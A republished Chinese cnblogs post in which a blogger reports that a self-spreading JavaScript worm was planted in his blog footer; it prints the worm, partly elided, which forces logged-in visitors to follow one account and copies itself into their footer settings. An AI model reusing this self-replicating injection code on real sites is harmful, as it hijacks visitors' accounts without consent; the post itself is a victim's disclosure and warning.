博客园被黑了?

博客园被黑了?

(抱歉占用首页一会儿)

是博客园被黑了还是只有我的博客被黑了?

刚发现我的博客被加入了下面的代码(出现在“管理->设置->页脚Html代码”里,其中一部分被我略去),有没有人遇到一样的情况?请管理员帮忙查一下。

这段代码在我这儿运行以后的效果是自动关注Darrel.Hsu的博客(链接是资料页没有恶意代码,博客有恶意代码,不要在登录状态下访问),到现在这个博客已经增加了几百粉丝(23:44有554粉丝,24:00时有565粉丝)。

Update: 可能是有某位注册用户在自己博客里加了这段代码,然后凡是处于登录状态下的园友访问这个用户的博客后都会被感染;如果处于未登录状态,则跳回到登录页,结果是博客里的所有文章都无法正常打开

被加入的代码如下:

<script>function hack(){
var id = "D_Hacker" + parseInt( Math.random() * 1000 );
function createIframe( src , cb ){
  var iframe ;
  if( ! ( iframe =  document.getElementById( id ) ) ){
    ...//略
  }
  iframe.onload = function(){ cb( iframe ) } ;
  if( src.indexOf("http") == 0 ){
    iframe.src = src ;
  }else{
    var doc = iframe.contentWindow.document;
    doc.open();
    doc.write( src );
    doc.close();
  }
}
var m = ["c", "n", "b", "l", "o", "g", "s", ".", "U", "s", "e", "r", "M", "a", "n", "a", "g", "e", "r", ".", "F", "o", "l", "l", "o", "w", "B", "l", "o", "g", "g", "e", "r"]
m = m.join("")
window.eval( m + '("b8a15066-1039-e011-ac81-842b2b196315")')
createIframe("http://www.cnblogs.com/",function( iframe ){
  var win = iframe.contentWindow;
  var href = $("#span_userinfo a:eq(1)", win.document );
  href = href.attr("href") + "admin/Configure.aspx";
  createIframe( href , function( iframe ){
    ...//略
    if( val.indexOf("b8a15066()") < 0 ){
      val = val +  "<scri"+"pt>"+ hack.toString() +";hack();</scr" +"ipt>";
      $("#Edit_txbPageEndHtml",doc).val( val );
      $("#Edit_lkbPost" , doc ).trigger("click");
    }
  });
})
};hack();</script>

本文转自博客园八进制的博客,原文链接:博客园被黑了?,如需转载请自行联系原博主。

时间: 2024-10-02 08:02:41

博客园被黑了?的相关文章

谈谈博客园和写博客,以及通过博客遇到的那些人

    不知不觉,博客园园龄已经5年11个月了,还曾依稀的记得,那是研究生毕业设计搞完了,有没有什么事情可以做,只能每天背个屌丝的书包去学院机房,狂赚CSDN积分,曾经高峰期的时候CSDN积分达到16000分,不过由于这几年免费分享给Newlife群使用,已经只剩下500分了.发现博客园后,才知道CSDN是多么的烂,好吧我不说CSDN,影响心情.说说这些年在博客园吧. 本来很早就想写这篇文章,只是今天心情很特别,正好把手上哪些蛋疼的方案和报告写完之后,就分享一下心得吧. 1.关于对博客园的看法

关于博客园代码样式的调整

我一直在自己的博客中使用的是自定义的syntaxHighlighter代码着色.参考:http://alexgorbatchev.com/SyntaxHighlighter/manual/themes/ 结果最近发现我的代码着色变成了: 发现没有,代码间距变的很大,样式很丑.通过查看源代码发现: 博客园的公共css增加了这一行: 1 <div class="cnblogs_Highlighter"> 这是罪魁祸首.解决办法就是在设置里面: 增加这一行就搞定了. 我的现在的样

【超详细教程】使用Windows Live Writer 2012和Office Word 2013 发布文章到博客园全面总结

原文 http://www.cnblogs.com/liuxianan/archive/2013/04/13/3018732.html 去年就知道有这个功能,不过没去深究总结过,最近有写网络博客的欲望了,于是又重新拾起这玩意儿. 具体到底是用Windows Live Writer 2012还是用Word 2013,个人觉得看个人,因为这2个软件各有优点,各有缺点. 1.首先用LiveWriter发博客显然更专业,发布后的效果也与本地最接近,但是在编辑功能上肯定大不如Word,另外一个最大缺点是它

ajax自动加载blogjava和博客园的rss

ajax|rss|博客|加载 自动加载blogjava和博客园的rss <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>

PHp + socket编程练习——博客园回复

因为也是学习的路上,先画出思路,代码和看别人的学习的,最后是根据的思路完成的,可能比较简单,后期在去完善和更改     <?php /**  * php+socket 编程 发送HTTP请求  * @version  c.php  * 模拟博客园评论  */ interface Proto{     // 连接url     public function conn($url);     // 发送get请求     public function get();     // 发送post请求

狂热+坚持=成功&amp;nbsp;博客园CEO&amp;nbsp;DUDU访谈

博客 人物简介:dudu 1997年毕业于南京电力高等专科学校,对计算机技术有一种执着的兴趣与热情,喜欢挑战性,喜欢为了自己的目标去努力,.NET技术的坚定支持者,博客园的创建者和维护者. 我见过很多技术类个人网站,以前的Visual Basic技术网站.Visual C++技术网站.现在的.net和Java网站,他们有一个共同特点就是在开始的时候红红火火,1-2年后就逐渐消亡,很难作大,很难达到收支平衡.悄无声息的离开,似乎成为技术网站的宿命.不过几年前出现的专注.NET技术的个人网站博客园让

狂热+坚持=成功 博客园CEO DUDU访谈

人物简介:dudu 1997年毕业于南京电力高等专科学校,对计算机技术有一种执着的兴趣与热情,喜欢挑战性,喜欢为了自己的目标去努力,.NET技术的坚定支持者,博客园的创建者和维护者. 我见过很多技术类个人网站,以前的Visual Basic技术网站.Visual C++技术网站.现在的.net和Java网站,他们有一个共同特点就是在开始的时候红红火火,1-2年后就逐渐消亡,很难作大,很难达到收支平衡.悄无声息的离开,似乎成为技术网站的宿命.不过几年前出现的专注.NET技术的个人网站博客园让我们看

WF4.0实战(四):博客园博客申请流程

概述: 我是两年前申请的博客园.如今仍然记得很清楚,与现在的方式有点不同,当时注册也是要申请的,现在是注册不需要申请,而注册之 后,开博需要申请.当时感觉有点新鲜,同样也感到欣慰,有如此敬业的管理员已经很少了. 其实,一个简单博客申请可以看成一个简单的工作流.它的流程图如下: 这篇文章中我将使用WF4.0去实现这个流程,这个非常的容易. 效果: 1.申请界面:

PHP仿博客园个人博客数据库与界面设计

自学PHP大半年多了,断断续续地,但是最终还是坚定了我的想法,将PHP继续下去,所以写这个PHP的博客是为了找个稳定的 PHP工作,不求工资多高,但求一收留之地.我能看懂大部分英语文档,人不蠢,爱学习,有兴趣地可以联系下!有诚意的来吧!qq:240382473 我会分3-5次发布所有关键代码和文档说明,博客后台所有的样式均套用博客园! 说明: 1. 不完全采用MVC架构,但是理念就是这样的.因为还不能写出很稳定的MVC架构. 2.几乎不采用JQUERY AJAX 因为不是特别熟悉,运用起来还不自